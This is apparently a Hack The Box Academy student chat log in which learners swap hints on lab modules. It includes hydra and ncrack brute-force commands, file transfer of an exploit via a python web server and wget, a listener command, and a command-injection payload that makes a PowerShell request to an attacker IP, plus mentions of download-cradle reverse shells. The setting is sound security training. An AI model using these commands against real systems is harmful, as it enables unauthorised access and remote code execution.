#modules

It's the login brute force module

if its Password Attacks be prepared to spend 30minutes before finding out you messed up

login brute force one is fairly quick, Id say probably like 10-15 minutes before Id get suspicious

gotcha ok

I think a found a issue with the LINUX PRIVILEGE ESCALATION Privileged Groups. I found the flag pretty quick using recursively grepping for "flag" and judging by the name of the flag (written in l33t) it should be the right one. Only thing is, entering the flag gives me the "incorrect flag" error. I'm pretty sure this is the right flag. I've tried entering in in curly brackets i.e. HTB{flagname} and without, but so far nothing. Has anyone else had this issue too? lol there's two entries. They are slightly different. Make sure you try both of them.^_^

I mean you may have found a flag for a different section and not the question youre on as boxes get reused a lot

uhhh I found the login finally, But now the site seems to not be working, I respawned it and it's still not working interestingly

Nvm, Respawned it a 3rd time now its working

You might want to remove that screenshot @ember valve

gotcha sorry

So when I am running gobuster, it gives me a progress ex. 2402/262000, how do I make it cleaner like the walkthroughs? Figured it out, add -z

anyone have the issue on the Stack-Based Buffer Overflows on Windows x86 module? the target machine will crash (not just the program) if i load a wav file with 4000 byte

amazing how one little letter can throw off your entire script smh

Exactly exactly

This happened earlier to me (not happy)

Just to make sure im doing this right, to get something to download from github is

git clone https://github.com/whatever-file Correct?

Seems right

fatal: repository 'https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt/' not found

I need it for the academy thing, and I can't extract the one Parrot came with for whatever reason

Oh!

That's because it's in another path

Dear god

Did you try

(Wait, theres more)

Locate rockyou.txt

bro I swear

One moment

Okieokie

rockyou.txt.gz, rockyou.txt.gz, rockyou.txt.tar.gz, rockyou.txt.tar.gz

Those are what was found

Let me find the path I used

God it was like

/usr/share

Then something else

/usr/share/wordlists/rockyou.txt.gz

Yesyes

But the only issue is, its compressed when I need it uncompressed

Try just txt?

But when I try to uncompress it, it says an error, and when I did that it just gives me errors

Wait, i think I know whats going on

Ouch

Let me know if you fix it!

I think im out of storage, I need to just add 100gb to my linux drive

Eh, just added 200gb more cause why not

Now lets see if it works

Okay I am missing something, can I ask virtualbox questions here or is there a chat for that

Did you decompress the file?

That's where I am trying to figure out how to add space to an existing partition but I dont know how to do that in linux without reinstalling

tar -xzf rockyou.txt.tar.gz

Figured the resizing of the drive, but I will try that L3!

Do you know the gz version of that command?

Try gzip -d filename

Thank you so much, that extracted the file

I think it was because I only had 17mb left on the drive and had to repartition my main drive, then do that

How do I decrypt tls_ECDHE_RSA_WITH_AES_128_GCM_SHA256 wireshark, I made my SSLKEYLOGFILE and it has keys, and I setup the file in wireshark, it decrypts http requests but it seems that wireshark has problems with ECDHE
however, fiddler does it perfectly fine, but I fiddler is strictly http

Someone knows how to remove copyright output from ffuf?

why

delete it from your wordlist

For footprinting - HARD for the users password do you ||crack his|| ||keys for john? ||

So for Responder very easy, it says in the walkthrough port 21/tcp open is supposed to show up, but it just shows me port 80/tcp open. I've restarted my machine, stopped it and reran it, and neither of those have fixed it, any ideas?

Ah, VPN services are down

nm found the file that I am pretty sure I need but stick on it 😦

ok anyone that can help me with foothold - hard I am officially stuck and I am pretty sure I am doing it right but getting an error that I must be typing something wrong

I can help, if you still need.

Hey all, for the PHP Wrappers in File Inclusion module, the data and input wrapper works fine. But expect does not return any results.

thanks shot you a DM

Footprinting medium lab. I ve got sa. But something is not working

Little help

What have you tried with sa credentials?

Used it to login on m sql server management studio

But got login error

Look at all the services on the box?

Wait i dm

Tnx dude

The nudge i needed

Hey everyone, I'm on the SMTP footingprinting module. On the last question, the hint mentions a footprinting-wordlist. Does anyone know what the hint is referring to?

I can't seem to find that list anywhere

Hey @lethal schooner I don't remember that module entirely, I want to say it's referring to a word-list in seclists thats apt for SMTP attacks or a wordlist mentioned within the lesson. Let me look at that module real quick.

I believe it refers to the wordlists provided in the resources on top right.

@pearl island Oh man, that went right past me. I didn't see that.

What is my job

@lethal schooner you got it? also thanks @pearl island I completely forgot all about that. 😅 I ended up using one of the names wordlists, took me forever to complete that section.

@rustic sage Yeah I get it thanks

phew..ive looked all over this wordpress site and still cant find this flag..must be blind

lol in the next module the answer is there.. I wasted an hour on the wordlist..

Always feels dumn when you complete entire modules but forget to reuse creds and then ask for help

Still feels like you didnt complete it completly alone

Hihihi

Hey I was here earlier asking about the module "Login Brute Forcing" I'm really stuck on the second question under "Skill assessment - Website" . Someone here told me I had a parameter wrong but didn't specify which, So I've been re-reading the module and the man page for hydra, still nothing. I've pick through the burp suite output for the site for anything that can help me but I must be missing something. I've run this command and let it fully run with no password hits. At this point i'd really just like to know what I have wrong so I can learn from it, Just don't know what i'm missing here.

||hydra -l user -P ~/william.txt 157.245.35.145 -s 32046 -V -I http-post-form "/admin_login.php:username=user&password=^PASS^:F=<form name='log-in'"||

^That's the command i was using

Username=^USER^

Instead of username=user

I was told to switch it to that since I've already specified the user name I think it is, which in the case of that section hint it should be just user, Should it just be ^USER^?

I did not know about that

Hi, I need help in the module "Attacking common services" in the section "Attacking SQL Databases" I already got the hash, but idk how to crack it, I used hashid to identify the hash but it doesn't work

Maybe remove -l and -V

Youean question 2 of the first skill assessment right

Iv completed that one

It should work with a simple bruteforce command

when i get rid of -l it errors saying it needs the user to be specified, and -V is just to have it be verbose so I can see whats going on in detail

Im sprry i mean the -I

I know

ahh yeah i had that in there to force skip the 10 second wait betweet running commands since it has the option to restart canceled processes

would that mess things up?

I dont know wouldnt hurt to try

Wait damn

Haha i think its not the command that wrong

Sorry i have tunnelvision

Maybe try other wordlist

Are we talking about the same skill assessment?

There are two

It is your wordlist i think

Yeah "Skill Assessment - Website" Which wordlist should I use?

the second question

Its been a long time man for me that i completed it

First try looking at the parameters

Its probably different then you first parameters

Like username

What are the name parameters of the form?

Is it username or something else?

oh its "user=username&pass=password"

Yeah sorry that i just thought about it now

all good!

wondering if maybe i have to use cupp to make a new wordlist instead of using the bill gates one

dont know who i should make it for

You already got the username

Now follow the theory on academy

Start small wordlist etc

You will get there i think

alright, ill switch it up and try different wordlists

Yey completed hard lab footprinting

gratz!!

guys need help in attacking authentication mechanisms module skills assessment

yea i was going to say, the parameters are different in that one

Hey to anyone who needs help I'm 40% done with CPTS & have completed the entire "skill path" modules except for AD Enum & binary exploitation. i like to help people so if you need a hint just send me a DM and I'll get you on track.

Ofcorse

||||

Thanks mate, solved the issue 🙂

Heya guys. I need some help transferring a file to the host. Using wget

This is in the linux privilege escalation module

What are you trying to do?

I have exploit.txt as shown above

I am trying to transfer it to this shell with the second screenshot

It is in the kernal exploits section on the linux privilege escalation module

I can use wget but I am not sure how

You'll need to host a server locally, so inthe folder (screenshot 1) python3 -m http.server (PORT)

Then on the box wget hxxp://tun0ip:port/exploit.txt

Assuming screenshot 1 is your local machine and 2 is your victim.

you know

its annoying that we reuse old accounts from modules far back to perfrom some attacks

I don't have the credentials anymore

hm says permission denied

Which?

What port are you using?

wley. On AD Trusts - Cross-Forests

The example uses wley, I tried using other accounts and it seems to not be working

I mean @finite gorge

my fault

80

No sorry was mb.

sudo

Try a higher port or run as sudo. Lower ports require permissions.

Alright it works

Eyyy I got it

thanks for help

Remember the process because you'll use it allllll the time.

Sure thing

Hi. I was doing the footprinting lab medium and am stuck at the mssql :/

Any help is appreciated

@teal birch how are u stuck

so i got the username and password ||alex:lol123!mD||

and logged in to rdp

but i can't find the password for the sa

and idk what the other user is

@teal birch enumerate smb again

oh alright

will try

thanks

thanks for the help. i finally did it:)

Ok

Hello everyone, how can I force my laptop to run on direct power and only use the battery when unplugged?

you can remove the battery if it is possible

hey ik this isnt the chat for this but can anyone help me get a instagram acc back

@stuck ravine what is the problem

my friends instagram acount got hacked just wanted to know if anyone can help

@stuck ravine hard to find someone who can help u

Someone has finished the Attacking Active Directory Skills Assessment part I ? I need help please

I am stuck at Service Authentication Brute Forcing

only 10 min left for target machine and I barely check 4000 or so passwords

I stop using -t 4 because it was sooo slow

hydra -l b.gates -P william.txt -u -f ssh://138.68.159.33:31979 -V

this is the command I am using

any help to decrease number of passes maybe

there are 13k passwords right now

should I put back -t 4 again because some of them failing

well here we go

ncrack -v -T 5 -u b.gates -P william.txt ssh://178.128.44.103:31957

with ncrack -T 5 . I ve found it within a minute

crazy

Anyone for the Skills Assessment of Using Web Proxies?

I'm stuck on the third question

What is the third question again?

Once you decode the cookie, you will notice that it is only 31 characters long, which appears to be an md5 hash missing its last character. So, try to fuzz the last character of the decoded md5 cookie with all alpha-numeric characters, while encoding each request with the encoding methods you identified above. (You may use the "alphanum-case.txt" wordlist from Seclist for the payload)

You need to generate a wordlist of all the potential md5 hashes, so the 31 characters + a-z,0-9.
Then send the wordlist via intruder in burpsuite with the correct encodings (I believe base64 encode then hex encode)

hi guys! Need help on WordPress - Discovery & Enumeration

Enumerate the host and find a flag.txt flag in an accessible directory.

Already tried every plugin and theme directory, wp-includes and still nothing. Any tips?

Edit: Found it. The answer is in the source code don't leave no stone unturned enumerate literally everything, wp-scan won't help you on this one.

Yes and I also add the incomplete md5 hash as prefix

So I think I wrong to set the positions

I've tried with cookie=§3dac93b8cd250aa8c1a36fffc79a17a§§P§ but I don't now if it's right

That looks correct, just make sure the payload it’s sending is correct

Somebody can help me with skill assessment :website from login brute forcing.? I don’t know which wordlist j have to use …

Hey everybody I am pretty new in here any advice where to start learn

It's correct I decrypted every cookie I send and it actually did all the tests but it keeps giving me 200 as an answer

Look at the content length

Just saw that the flag appear on the page and I didn't notice it

Thanks for the help

Good afternoon, I'm in the Linux privilege escalation module

There is a part that I need to use an nc but it is returning "permission denied", can anyone give me a light on what to do?

Hello I try to dump Lsass in SeDebugPrivilege Windows Priv Esc but i have this error any idea ?

Anyone got a sec to help with the ad assessment part 2?

You need to use privilege::debug

Feel free to dm

Have you run cmd as administrator?

I think you can get that error if you don't have privs to do it.

I just solve it i'm dumb i don't see i don't set the dump in the same folder

Hi, Can someone help me

htb-student@NIX02:~$ nc -lnvp 443
nc: Permission denied

sudo

Port 443 requires sudo privileges. Go higher if you don't want to sudo.

Thank's you!

Anyone able to help with the mount in the NTFS vs. Share Permissions lesson? I'm trying to do the mount but I'm getting a "mount: bad usage" error, I went back and installed CIFS Utilities but am still having hte same issue

Do mounts not work in the PwnBox? I cannot figure out what I'm doing wrong when I try to mount to a shared folder

bad usage usually means your syntax is bad

Also check firewall on the windows host

I figured out the syntax issue, now I'm getting a message saying the "mount point does not exist"

sounds like the mount point doesnt exist

Ok so I'm following the instructions in the lesson, what am I missing?

which module and section?

Windows Fundamentals, NTFS vs. Share Permissions

I've created the folder, changed the share permission for everyone to full control, and then go to mount to the share and type it in exactly the way it says and get "mount point does not exist"

How do I check the firewall?

Anyone else having hitting their docker machines?

Im trying to do sqlmap and I cant hit the site at all atm

annnnd now its working

ah sorry, not a module Ive gotten or intend to get so I cant verify it. Best of luck.

Hi how am I supposed to login to smtp for the attacking common services? I believe I found the user and pass but I always get authentication failed

Who says those credentials have to be used for SMTP?

I just assumed they would work because I used hydra to get the credentials

If hydra can login shouldn’t I also be able to?

One way you could do it is with your RDP session open the search bar in the bottom left corner of windows and search "Windows defender" and see if the firewall is on .

Password attacks - Network services - 1st question

I am using this command

crackmapexec winrm 10.129.115.165 -u username.list -p password.list

and getting this error

WINSRV\aspnet: "SpnegoError (16): Operation not supported or available, Context: Retrieving NTLM store without NTLM_USER_FILE set to a filepath"

thats an odd error to get

are you using the pwnbox version?

also may be worth trying the --local-auth option

hi guys

Is anybody else having trouble spawning the target systems?

i wanted to know if it's a good idea to start with javascript
also is it possible to hack server sided things ?

me

i just spawned one fine

now it is working

yea same

oh well

I recommend python if you aren't too interested in getting into an abstraction of the processor and just want to write useful code. If you are, then C, but it's, complex, python is a little easier to digest if you aren't dedicated or already used to coding.

Boxes are getting easier and easier because of academy

thank you
there is a game that i want to try to "hack" into its server sided things
But the game is built with javascript

I dont wanna destroy it ofc
just curiosity

Learn js

sketch

Cause many told me you cannot hack server sided things

And create an online escape room through point and click

Its fun

i need like one year or more xdd
im like a super mega beginner
I dont even know all computer science basics ;-;

Then start with js

is there a youtube playlist with ordered stuff to learn in ?
How did you learn ?
I cant find smthing ordered

And html

Css

html useless no?

Not really proframming

But ots a start in setting the basics

lol

And python for simplicity

yeah
how did you learn from start
I need something
Like a plan
I cant just go randomly

Depends

What do you want

i wanna become a good hacker

or a good programmer

Yes

I started with html and grafuatly rvolved

Never had a clear goal

hey
i want to show you the game
Mb just discover it a bit and tells if something is possible

oh wow

Where did you learn it tho

Html you wil learn in a week

and js?

Youtube, codecademy

ah ok

you like 2d pixel shooting games ?

Or 2d games in general

Depends:p

ok check a browser game called :
slay.one
im sure you will like it

you can also read a lot of its code easily

but i just wanna if its possible to hack server sided things
for example : being immortal in it
Some ppl told me its IMPOSSIBLE to hack server sided things in it
But im sure thats false

I am still getting the same error

I am using VM - version 5.4.0

hmm not sure what the pwnbox version is but thats probably the issue

hmm let me try with an instance

Hmm Im pretty sure I got the flag for the sqlmap assessment but its not taking it. Can someone verify I have the right flag and im not going nuts?

pwnbox version is 5.2.3 so maybe cme broke something in a newer update

sure hit me with it

Thats a pretty new module so not many folks yet

I was just trying to dual Boot parrot (htb version) and Windows. (Not for hacking/htb purposes - just for getting familiar with it)

Anyone knows what reasons can exist that parrot is Stuck in shutdown process after i hit shutdown? Its like an endless loop

Some one help me in Bash scripting?

I need code like
if folder B in folder A matches with the folder D in folder C then move Folder B to Folder D

I mean if name of folder matches move it

Hey I am sorry could I message you please

Hello can I message you please

Hey Reapingyou sorry please message me

Hello trying to reach Reapingyou please let me message you sorry would you please contact.

Dont spam

I am not spam

you literally are

No I am not

channel is for discussing modules, not you repeatedly trying to message one person

send your request to dm once and then move on, more times is just spam

ok

I DM you

no thanks

Ok I am done with Yack the box

glad I wasted money on this

Bro shut up lol

ok

hi all, I'm doing Footprinting lab Medium and I am stuck at SQL Management Studio. I found the file in Alex's folder which has the cred <user>:<password> . I used those cred in the studio and got an error

A connection was successfully established with the server, but then an error occurred during the login process. (provider: Shared Memory Provider, error: 0 - No process is on the other end of the pipe.) (.Net SqlClient Data Provider)

reading through some of the interaction in the past, some ppl suggested to use "Administrator" instead of "sa" . That did not work too

Without any clue of the module: I checked for the error message and found a mentioning of an issue due to the selected authentication mode. Maybe you can check that out.

Actually , i was accessing the RDP with a different cred. Finally solved ! Thanks for responding anyways :))

Reapingyou

🥳

SilverKnight if you are trying to get help with a module, you can try posting what module/section/question you're having trouble with. If you want to provide details on what you've already found or tried, then hide that part behind a spoiler.

I was trying to get intouch with someone I used to message but since having a falling out guess not people today are incapable of working out indifference and are too soft

bro this channel is for module discussion not your personal grievances, shut up

ok make me

@novel matrix hey mod this guy keeps spamming the modules channel with his personal grievances with some other user whose not even here.

yooo

look like I said I tried to ask for help you run me around is this what I paid for

can we please make sure we stay on topic with the channel description.

I have a paid subscription

ok

I'm guessing you tried reaching out to one of the employees?

bruh Ive paid too, most of the other people have paid too, were not your freaking slaves were also students

@thorn urchin stop please 🤍

No more otherwise, I'll be handing out mutes.

ok

Dm me what the issue is with the module

Anybdoy having problems

It says failed to target target machine

Module challenges fail to stay up and target dies 5 seconds after starting the challenge. HOW TO FIx?

):

Might be specific to the module. I've been fine for the past 15 mins. Are you using OVPN?

Challenge doesn't need to be connected with OVPN

What module?

file upload vulns

can't tell if F5 the page breaks the box

Felts like I refreshed the page before and the target was still up...

now I have incomplete data ):

I had some issues refreshing previously with their antak webshell yesterday. Seems somewhat hit and miss.

):

Anyone else notice the "time left" field is kind of jacked up?

Can someone help me on skill assessment (second question) of the Login Brute Forcing module. I used the below script but cannot find the answer.

hydra -l user -P /usr/share/wordlists/rockyou.txt -f <TARGETIP> -s <TARGETPORT> http-post-form "/admin_login.php:user=^USER^&pass=^PASS^:F=<form name ='log-in'" 

nvm, just did it.

Hydra is a syntax nightmare. Xhydra helps a lot, in case you have to use it again.

thank you

Does anyone know if the AD tools folder is available for download

I know they give us the list under resources but I figured there might a download somewhere

Does anyone know how to get WinRM, is it on github?

does anyone know of a convenient way/tool to create a valid user's list using AD user enumeration?

i get that you can get valid users w/ like kerbrute but it would be mighty convenient if I could get them in a list for password spraying

Im just now on starting point box three, and I am just now having issues LOL

But I was getting a proxy error after adding it to /etc/hosts , now it says that it cant establish a connection to the server rip

So im just waiting for it to respond

Yeah, its still not coming up, something broke

Not actually. You can write most commands in a user-friendly syntax, for example:

hydra -l USERNAME -P /usr/share/wordlists/rockyou.txt "http-post-form://IP:PORT/login.php:username=^USER^&password=^PASS^:F=login" -t 64

Hey Pedant, you know how to fix courses per chance lmao

Which module?

I think I done messed up but I've followed it to a tee, and its Three under very easy

!!

the s3.thetoppers.htb

Are you doing Academy or the main platform?

Academy, is this not the right chat?

It is, which module?

Is this it? https://github.com/theyoge/AD-Pentesting-Tools

Tier 1, Machine named Three after responder

Where did you find this??

Googled AD Pentesting Tools in google, then found the github link

wtf

This is not the Academy (https://academy.hackthebox.com/). You need to go to #starting-point

Oh!

Thanks @worthy jasper , gl with what your working with

Thank you LOL, I've been asking here and I've gotten help in here for this as well, I think I somehow got to this when I was in Academy

That explains why it jumps from easy to difficult in my brain, thank you Pedant :D

And no problem jramos

NP Good luck

But if you do know how to fix it, could you answer me there? :D

It is not the place for it.

Anybody completed the Linux Privilege Escalation module?

Imma bit stuck on the Special permissions section.

Just need some guidance on how to do it.

What are you struggling with? @finite gorge

Is there any issues going on with the modules tonight? I am trying to ping the IP of my machine and it isn't giving me any feedback and times out in terminal

Where I am: Interactive Section with Target // My instance isn't even working either which may be an issue

I'm on a box RN with no issues.

Weird

Has the box timed out? They will die in the background wtihtout really telling you. Refresh page and see?

Im on Academy-Regular VPN, and yes I refreshed the page and even my vpn, just disconnected and reconnected

Can you see if you can ping ||157.245.41.35||?

Which module are you doing

Module 15 section 453

Interactive Section with Target

are you connecting tot he right port? they generally wont accept pings

Yep, one momenty

Oh, that's a docker box. You don't evemn need VPN.

You can just visit ip:port in browser.

Well I am stupid then LOL, lets see if that works

What is the proof text displayed in the Target** website **you browsed?

Thats what it was

http://157.245.41.35:32763

Well now to do fundamentals to linux to learn how to operate linux better

It is now on the Linux Privilege Escalation module on the section of Special Permissions

In 'Documentation & Reporting Practice Lab' in the notes left by the tester and precisely in 'H5 - Local Admin Password Reuse' there are the credentials of the administrator. Where did they come from? On which host were they found?
Thank you!

Please i need help with skills assessment 2 of nosql injections atacks

Which question?

Has anyone finished the broken auth module?

Dat colour scheme!

Both of them on the screenshot you can see

I need help with either one of them

Finding SUID you'd do find . -perm /4000 and sgid /2000`

@finite gorge well @candid zephyr covered the commands but do you understand what SUID and SGID are used for practically? Why would someone want to have those bits enabled and which scenarios this is insecure?

does the module not teach you that?

I don't know I never done HTB academy

oh. why are you in the htb academy modules chat lol

answer the questions sometimes

a lot of the questions seem specific some of the stupid shit you come across in the modules haha.

yeah that's why I only answer sometimes 😄

i haven't done many just the windows privesc and ad attacks one. they're well written. i tried the binex one but it's all a bit outdated feeling.

i would do some if the pricing was better

Yeah cubes feels scammy af

micro transactions feels

i bought the windows and ad one off a single 1 month sub which feels good

I liked windows privesc. I think there has been an update since I last worked on it though so I could go back. AD is on my list, I just haven't gotten to it yet.

Thought it was really well written and useful. The same author did the AD one, so I'd do more of his I suppose.

Hi guys, stuck at Windows Privilege Escalation Skills Assessment Part I, at the foothold. I feel like I'm doing the right thing but it's not working

Edit: solved.

Hint: ||not all commands work from the webapp, even if they work on the machine||

The skills assessment?

Yes

You get given the creds to log into RDP

There's none? We're supposed to exploit a command inject on the webapp

Oh shit sorry yeah

The web app I forgot.

How well do you know command line stuff?

Can you see it will ping your box if you give it an IP?

Student discount go burrr

What if you wanted it to run two commands...

I did that module yesterday. Semi colon is blocked afaik

I mean specifically that micro transaction style of removing the value away from currency. EUR > Cubes means you forget what they are worth suddenly.

Yeah. What else would you do?

But just go to payloadsallthethings. Plenty of payloads to try

If you wanted to execute a command only when the first one completes.

Fair. I don't even think about cubes. I get everything for $8 a month

I mean, I figured that. It's just that my second command seems to not be running. I try ||127.0.0.1 & powershell -c 'curl http://10.10.15.28:8000/'|| but it doesn't get executed at all

Or other variations of that, like iwr -uri

&&

Same

Do you use nishang?

I think it's in the module.

Nah I just wanted to try simple stuff first

I did it differently

https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command Injection

Try some of the payloads here

There are more than a few that work

nishang is the simple way imo haha

they gave you the command and script in an earlier section

Nevermind I just got a shell

Still curl, wget and iwr don't get executed, but spamming shells finally does work

Well, it's a windows machine. There's no garuntee Curl or wget are installed

If you wanna download something, always go for certutil first on a windows machine

It'll work 99% of the time

Forgot about that, but iwr didn't work for a quick request

Nishang is covered in the Vulnerable Services section btw

Well now that you're on the machine Try to figure out why lol

Barely. They gloss over invoke tcp for like 3 and a half seconds

I think it's the only section that actively gives you a command that'll execute a reverse shell outside of metasploit and nc.exe lol

Fair

Maybe it's because I used the course as a refresher so used nishang a lot before that it stuck out to me.

I usually just use nc lol

It does work on the machine, curl, iwr both work with powershell and powershell -c. I guess the web app is weird

Hmm yea. Maybe see if you can find the source code for the web app after you privesc. Could be something blocking it there

Who knows 🤷‍♂️

it works with iex (new-object net.webclient)

I think question 2 in that assessment is a prime example of weird academy module shit haha

Ehh. Idk, it's just credential hunting which is something you should be doing anyway

They say in the prompt that there is no AV on the machine so I just uploaded lazagne after I got system

That's the point tho. You need system first. So it shouldn't be "Enumerate Hotfixes" "Find this File"

It'll make people think they're doing it wrong.

It was a good module nonetheless. Just being picky. :-p

Fair

Idk

I don't usually pay attention to the questions

Based on the module i know what I'm supposed to do. So I do it, and then afterwards I go back to answer questions

I did the same thing on the Linux privesc

Get root first, answer questions later

Hey

There will be any discounts on VIP for christmas

Nothing announced to my knowledge. Only sale I'm aware of is on ProLabs. #📣-announcements message

Hello

I need help with last part of Footprinting Lab - Hard, if someone can DM me

Im sitting down to do those now. Will let you know when I finish it

sure shoot me a dm if you still need help with that

Trying to use ||Inveigh|| to get creds for ||CT059|| on the pwnbox, but neither the .ps1 nor .exe are on it. Sanity check: should I pull it from GitHub, compile it and transfer from my Kali -> Jump -> Target? Or am I over-engineering this likely disaster?

This is for assessment part 2, AD enum/attacks btw.

Hmm I tried it but didn't seem to work for the answer

I tried putting that into the answer but it didn't seem to work

So the . means using your current directory.

So if you're in /home/htb-student/ searching . as the directory starts there

so the full path is actually /home/htb-student/shared_obj_hijack/payroll

hmm

alrighty lemme try that

If you type pwd

It'll show your current path Then you can just append that.

I see

If you change the command to find / -perm you'll start the search from /

It's just the directory to search in. find /home -perm /4000 will search in home dir and so on and so forth.

I see

I am still struggling to find the right answer

do find / -perm /4000 2>/dev/null Sry fix my syntax x)

presumably it'll give you the full path of any binaries with suid set. I'm guessing it wants the entire path as the answer

This is what it returns

Change . to /

okay now I'm getting something more

but boi its a lot

Not sure which one to put

a lot of them are default

a lot of the /usr/bin ones you can ignore. are there any that stand out as being like /opt or /home

I presume for the sake of this question anyway.

Also if you want to know why you'd look for SUID binaries, websites like https://gtfobins.github.io/#+suid have default exploits

@candid zephyr shared object hijack sounds juicy to me 😄

I tried looking at them one at a time. Still didn't get the right answer. Not sure if I am making a mistake by putting the answer

I think one that stands out was /usr/bin/at

@candid zephyr Did you solve this section before?

Hello i'm in the Domain Admins Group but i can't access to admin Folder or the flag in DnsAdmins > Windows Privilege Escalation any idea ?

Try to run cmd as admin?

can someone validate my commands for the information gathering - web edition. ||I am running FFUF, Gobuster, and WFUZZ||. Running the same command I have used with other boxes with no issues also. I am using namelist.txt as it mentions in the module.

Didn't work

Are you in the DC or a client machine?

#modules message

try that or make a shell and make the dll file run that shell like i did

Which wordlist I have to use wit the brute force module assessment website

sure shoot me a dm with your command and which section you are on

this is a bit too much spoiler so shoot me a dm i'll give you a little hint

for the second question use ||rockyou||

Thanks it works !

ty for trying yo help me ❤️

Hi I stuck at Php wrappers module.. If someone could help me, give me a hint, I would much appreciate it. I have gained RCE through PHP Input Wrapper... the flag should be at / , yet http//IP:PORT/...&cmd=id i do get uid=33(www-data)... cmd=cd / && ls. does not work... cmd=cd / cat flag.txt also does not work.... Do not know how the hell can I travel to the right directory to cat the flag...

look like a php wrappers section name because there are no module with that name but for your issue try ls / or if the flag is named flag.txt you can just cat it cat /flag.txt no need for cd

and if you are in a RCE shell you can't use cd either

These does not work. Module 23 section 253

the file inclusion module?

Yes

yep for this the flag isn't named flag so do a ls / first

hello

hi

Ls gave only en.php, es.php, extension php, image.php, index.php and style css...

then you are missing the /

Yeah now gave it a 378...txt but cannot read it... Ls / && cat 378.....txt does not work...

but why do you also need the ls command for when using the cat command?

Cat 378...txt does not show anything

Ok I found it

Need someone to verify an answer to the 4th question in Intro to Network Traffic Analysis > tcpdump fundementals. I am helping someone and the answer that I used and was marked correct does not work for him.

Thanks I found it.. OMG...

Anyone having problems connecting to Academy VPN?

no, Just connected about 30 minutes ago

sure shoot me a dm with the answer you need to verify also did the person you help try a refresh or even a hard refresh

if that person did but still nothing this isn't the first case

really? been connected for a few hours now having connection failed. Gonna reboot everything and change vpn files, hope it does the trick

dumb question but is your pwnbox on?

Can someone confirm that Web Service and API Attack Module >> Section file upload always break the page and if it loads i can not click the target spawn button.

if i refresh page does not load

Has anyone completed the Information Gathering - Web Edition VHOST using a VPN and not the PWNBOX. I get the flags in the pwnbox but can not get the flags using a VPN and my /etc/hosts file is fine and I can ping inlanefreight.htb

I have completed it a month ago or so and had no issues

With VPN

would you mind running ||gobuster ||on it again and see what you output. I can get the flag with the pwnbox but nothing on VPN. I am curious if its the box

Let me get to my machine and I dm you if that’s ok

sweet thanks

Hey sorry no, I haven't done the linux privesc. It's a pretty fundamental question so I assume it intends you to answer one of those first /home options. The question implies it's already shown you one of the SUID binaries in the text above it.

Hi , im in footprinting module in the IMAP/POP3 and i can't find the last flag ( i searched in the server and only i finded 1 mail). Any hint?

here give this a try from the top down https://donsutherland.org/crib/imap

here you have another resource just in case: https://www.atmail.com/blog/imap-commands/

Hello everyone, I am stuck again hahaha
Module
Password Attacks
Password Reuse / Default Passwords

Question
Use the user's credentials we found in the previous section and find out the credentials for MySQL. Submit the credentials as the answer. (Format: <username>:<password>)

I used sam's pass from the previous section and connected to target via ssh.
There were two other users.
I used every possible option came to my mind

1st
used this list
DefaultCreds-Cheat-Sheet
2nd
get only password from that list and use usernames I found on the target
++++ I used ftp to bruteforce as it was open
++++ ssh server doesnt have ncrack or hydra installed and sam doesnt have any priv

What should I do now?? Any ideas??

Sorry I can't help you there Rexkmes, I havent even gotten to this part yet LOL

hint ||answer is in one of the link|| and you ||got the right one|| so you may want to remove it due to spoiler

I was going to ask a question, but I figured it out. I tried doing ||find / -type f -name .log 2>/dev/null | wc -l||, but I forgot to add the * before the ||.log||

Remember that the section name is Password Reuse / Default Passwords

You can pass this section without using any list

I hope this doesn't get flagged for to much of a hint, but for Gobuster and enumerating VHOST ensure that you use the --append-domain flag or it will not find the vhosts depending on the version of Gobuster you are using. Specifically I found this out in the Information Gathering - Web Edition VHOST module. I couldn't get anything to work with exception of FFUF and on the pwnbox. I noticed the pwnbox used an older version of GObuster and the new version sets append-domain as false for default.

delete the link you mean??

yep

the link is the provided one from the section I think its fine lol

Ok, I found the answer. After trying them one by one, manually. The weird thing is username and password not working on the target machine. sam@nix01:~$ mysql -u --username-- -p --password-- -h 127.0.0.1

Thank u, finally got it

that is the command I am using while in ssh server, with the right creds of course

Hello I am seeking guidance for the module: Footprinting - Medium Lab. I have found the a user through RPC, which allows me to use RDP but I don't seem to have the credentials to enumerate the MSSQL service. Where do I go from here?

I have the same doubt, did u get it?

I have tried enumerating almost every other service on the host.

Message me if you want a specific hint if not I can say keep looking around you will find something, but it’s simpler then you probably think

Sounds good I will message you now.

On the AD Skills assessment 1 I was wondering what sections would be useful to read to get the flag. There is just a lot of new information to digest and filter for a newbie.

Did you take good notes from the sections?

I usually take notes after I complete the modules

Maybe I should take a break from the skills assessment and get some good notes

While I haven't done the ad module yet, from the ones I have done, they're usually structured in a good order for what to look for. So yea it's a ton of info to digest and a lot to look for but just go in the order the module did and you should be fine

But yea, I'd make sure you have good notes on every section of each module

Oh yeah, even my bad note taking ass takes notes for each module section. I constantly refer to them during the skill assessments

There are a ton of very useful commands and tools in all of them

Great advice everyone

AD is a weakpoint for me

Also make sure to actually save every link. They're all very very VERY useful

Its also proven that the act of taking notes even if you dont look at them ever again reinforces memory and the concepts taught.

Yea. Which is especially important considering HTB Academy is very heavy on reading

like just a snippet of my notes so far lol

I need to learn how to use obsidian

I do a little bit of reorganizing where I feel appropriately

I use notion

I use emacs 💀

I dont like notion because its cloud sync and not encrypted. I want to be able to make sure my notes are secure if I put anything confidential in there

Fair

I'm a student in college so I'm moving around a lot

Much easier to have my notes in the cloud for now

I actually have to pay if I want to auto sync my obsidian notes, and even then they use end to end encryption for it

Yea

Yeah no fault there, I just want to 'future proof' my note taking methodology

Fair. I'll start using obsidian eventually tho. You can export notion to markdown files so I'll be able to just export my notes and turn them into an obsidian vault

yup

obsidian notes are also just folders and .md files, so you can also setup your own syncing system if youre so inclined.

hi guys! Im at the attacking common applications module in the PRTG Network Monitor section

Im trying to get a reverse shell on the parameter field of a notification but for some reason the powershell payload doesn't work, tried with all variations of powershell from revshells. Any tips?

did you confirm you got RCE with a ping command or something like that? also to run the thing you need to click the bell icon on the right that have "Send test notification"

Yeah i got RCE because reproducing the example from the module( Adding the prtgadm1 user) works. I've been having trouble getting a rev shell really

if you get smb pwned with cme then just use psexec as your valid user.

the only note i got on getting a rev shell for this is in metasploit and powershell rev shell don't usually work for me for some reason

getting a reverse shell is sorta of the challenge of that section

havnt done that section yet but the exploit path might not handle stacked queries well thats often needed for good rev shells

a shell is a shell

Yeah, i've seen the one with metasploit, was hoping to manage to exploit it manually

maybe try with metasploit web delivery?

is the service running as system or an admin? presuming yes if can add a user

